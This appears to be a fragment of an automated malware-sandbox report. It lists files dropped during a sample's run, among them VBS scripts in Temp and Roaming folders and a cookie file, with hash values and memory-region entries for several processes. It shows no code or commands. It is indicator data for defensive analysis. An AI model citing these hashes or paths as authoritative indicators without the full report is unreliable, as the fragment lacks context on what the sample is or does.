            Filesize

            177KB

            MD5

            435a9ac180383f9fa094131b173a2f7b

            SHA1

            76944ea657a9db94f9a4bef38f88c46ed4166983

            SHA256

            67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

            SHA512

            1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

          • C:\Users\Admin\AppData\Local\Temp\viukkswkgihtujkdkxlosperqpdnoza.vbs
            Filesize

            544B

            MD5

            2b11dcb8a12dfca0d7785fa8f3306887

            SHA1

            a26d67e97842c2783f40d4d02c9cfcd0820d2e0d

            SHA256

            baa23e54cef0fc14218f4242cd0b121519d6f03c4a60202e12ea1e5de1031d7e

            SHA512

            fdda450a5a6a75fe98e0b51b6e1fd1e1227e611769da9e224ed90b1fbc447c69f9e714fe577c90c2cd277ef211f2cd9d50a89b4b954682401dfba1cd8bbc6ebc

          • C:\Users\Admin\AppData\Local\Temp\{26D364E9-161C-4332-ADF3-D0AB664A7D26}
            Filesize

            128KB

            MD5

            7debfd77a4d3d2ac8883fcd26447195a

            SHA1

            7ec6ceaf986ac435285dbdb2a0d6cd343ece1dce

            SHA256

            40ed91eacbe092f50c4baf13676b7991f80410299634a75edd7dc1cb03715c6b

            SHA512

            f1ac4a61ec8cb28fffec1a9954adf1883273fcd43c6a200537868600be4f9ab7d9934160d3658f5a4b17a3b6520545441845203ee17b5304025ba3b558c865db

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\TZT75PLH.txt
            Filesize

            829B

            MD5

            ab70bdf3a220743543993ef85a6d4a7f

            SHA1

            2e565cda24eb97c06b8ec5679b17a5112160d193

            SHA256

            1340e17277f5ba592f9d0e936880edea5574bc69b8126c2355cb780982ce08b8

            SHA512

            3128e6fad021686c5b4e12fe2e56649cf3db30322dd7cdbc1a74f9619ea511d99ef036b7c538ad4eef4bee88ae9e36d175c975cd1f90ee8e6a30118ad53a84ab

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NQKQAPXAWIX67Q2IA83B.temp
            Filesize

            7KB

            MD5

            2f786f7aea5393a1772c427c51e2c6e6

            SHA1

            08f91f70bf872382c580bc6584bd390860e437f8

            SHA256

            dde560eb889d15accb3d108b313760c7bd045aa9b7899930ff0b154ff87185c2

            SHA512

            2c491a8655f8b4965d671b5d334e0e66e6370079fea72e95647494e673d4af25e84a16081d2a04fe301136284581b95f1f4d4b2278ca9ee80e8301a332618aa1

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            Filesize

            7KB

            MD5

            24ecf5952c68c0fbb9e8d66daccb5bf8

            SHA1

            0d28042c83a91bed23df8967d35f32c674abefa7

            SHA256

            657e31358f7f5835db9b595ebd9565bfe8fac5b16d459ce4d06c4884b1ba2e8b

            SHA512

            280234aca20930a9e290030d1c59252a3ab509c21a428665ff1389b2b243edb435a207cf5444daf226f205a2d10ab403d08d25fdb68b1a293e16a2c4f157cdce

          • C:\Users\Admin\AppData\Roaming\exampleofkissinglovers.vbs
            Filesize

            108KB

            MD5

            e2dc751c9e0ba813649506c05af995c9

            SHA1

            a5bb9b9df1eac4160e846e86da778c9801218f20

            SHA256

            171f8fb9e2aa1884d7626973fb7a1e317e2d14f23dcb8734383ae103ddad30b6

            SHA512

            41778882b5353c18b361a5bab49b88375b4b880424aebf59f3b7c8d8b8cd935a274785e4e76722825b461b25c6d6a6911050d4b7e8f7e6c8971d193ce1a8ad3d

          • memory/1764-226-0x0000000069EA0000-0x000000006A44B000-memory.dmp
            Filesize

            5.7MB

          • memory/1764-140-0x0000000069EA0000-0x000000006A44B000-memory.dmp
            Filesize

            5.7MB

          • memory/1764-141-0x00000000025C0000-0x0000000002600000-memory.dmp
            Filesize

            256KB

          • memory/1764-139-0x0000000069EA0000-0x000000006A44B000-memory.dmp
            Filesize

            5.7MB

          • memory/1764-250-0x0000000069EA0000-0x000000006A44B000-memory.dmp
            Filesize

            5.7MB

          • memory/2212-0-0x000000005FFF0000-0x0000000060000000-memory.dmp
            Filesize

            64KB

          • memory/2212-28-0x0000000001ED0000-0x0000000001ED2000-memory.dmp
            Filesize

            8KB

          • memory/2212-216-0x00000000729BD000-0x00000000729C8000-memory.dmp
            Filesize

            44KB

          • memory/2212-1-0x00000000729BD000-0x00000000729C8000-memory.dmp
            Filesize

            44KB

          • memory/2640-249-0x0000000000400000-0x0000000000482000-memory.dmp
            Filesize

            520KB

          • memory/2640-245-0x0000000000400000-0x0000000000482000-memory.dmp
            Filesize

            520KB

          • memory/2640-268-0x0000000000400000-0x0000000000482000-memory.dmp
            Filesize

            520KB

          • memory/2640-269-0x0000000000400000-0x0000000000482000-memory.dmp
            Filesize

            520KB

          • memory/2640-264-0x0000000000400000-0x0000000000482000-memory.dmp
            Filesize

            520KB

          • memory/2640-263-0x0000000000400000-0x0000000000482000-memory.dmp
            Filesize

            520KB

          • memory/2640-262-0x0000000000400000-0x0000000000482000-memory.dmp
            Filesize

            520KB

          • memory/2640-261-0x0000000000400000-0x0000000000482000-memory.dmp
            Filesize

            520KB

          • memory/2640-260-0x0000000000400000-0x0000000000482000-memory.dmp
            Filesize

            520KB

          • memory/2640-234-0x0000000000400000-0x0000000000482000-memory.dmp
            Filesize

            520KB

          • memory/2640-238-0x0000000000400000-0x0000000000482000-memory.dmp
            Filesize

            520KB

          • memory/2640-241-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
            Filesize

            4KB

          • memory/2640-240-0x0000000000400000-0x0000000000482000-memory.dmp
            Filesize

            520KB

          • memory/2640-239-0x0000000000400000-0x0000000000482000-memory.dmp
            Filesize

            520KB

          • memory/2640-243-0x0000000000400000-0x0000000000482000-memory.dmp
            Filesize

            520KB

          • memory/2640-236-0x0000000000400000-0x0000000000482000-memory.dmp
            Filesize

            520KB

          • memory/2640-235-0x0000000000400000-0x0000000000482000-memory.dmp
            Filesize

            520KB

          • memory/2640-232-0x0000000000400000-0x0000000000482000-memory.dmp
            Filesize

            520KB

          • memory/2640-230-0x0000000000400000-0x0000000000482000-memory.dmp
            Filesize

            520KB

          • memory/2640-259-0x0000000000400000-0x0000000000482000-memory.dmp
            Filesize

            520KB

          • memory/2640-258-0x0000000000400000-0x0000000000482000-memory.dmp
            Filesize

            520KB

          • memory/2640-248-0x0000000000400000-0x0000000000482000-memory.dmp
            Filesize

            520KB

          • memory/2640-257-0x0000000000400000-0x0000000000482000-memory.dmp
            Filesize

            520KB

          • memory/2640-251-0x0000000000400000-0x0000000000482000-memory.dmp
            Filesize

            520KB

          • memory/2640-255-0x0000000000400000-0x0000000000482000-memory.dmp
            Filesize

            520KB

          • memory/2640-252-0x0000000000400000-0x0000000000482000-memory.dmp
            Filesize

            520KB

          • memory/2640-253-0x0000000000400000-0x0000000000482000-memory.dmp
            Filesize

            520KB

          • memory/2640-254-0x0000000000400000-0x0000000000482000-memory.dmp
            Filesize

            520KB

          • memory/2828-25-0x00000000729BD000-0x00000000729C8000-memory.dmp
            Filesize

            44KB

          • memory/2828-27-0x00000000037D0000-0x00000000037D2000-memory.dmp
            Filesize

            8KB

          • memory/2828-217-0x00000000729BD000-0x00000000729C8000-memory.dmp
            Filesize

            44KB

          • memory/2828-23-0x000000002F361000-0x000000002F362000-memory.dmp
            Filesize

            4KB

          • memory/2988-229-0x0000000069EA0000-0x000000006A44B000-memory.dmp
            Filesize

            5.7MB

          • memory/2988-225-0x0000000069EA0000-0x000000006A44B000-memory.dmp
            Filesize

            5.7MB

          • memory/2988-224-0x00000000027F0000-0x0000000002830000-memory.dmp
            Filesize

            256KB

          • memory/2988-223-0x0000000069EA0000-0x000000006A44B000-memory.dmp
            Filesize

            5.7MB

          • memory/2996-246-0x0000000069EA0000-0x000000006A44B000-memory.dmp
            Filesize

            5.7MB

          • memory/2996-149-0x00000000028A0000-0x00000000028E0000-memory.dmp
            Filesize

            256KB

          • memory/2996-147-0x0000000069EA0000-0x000000006A44B000-memory.dmp
            Filesize

            5.7MB

          • memory/2996-148-0x0000000069EA0000-0x000000006A44B000-memory.dmp
            Filesize

            5.7MB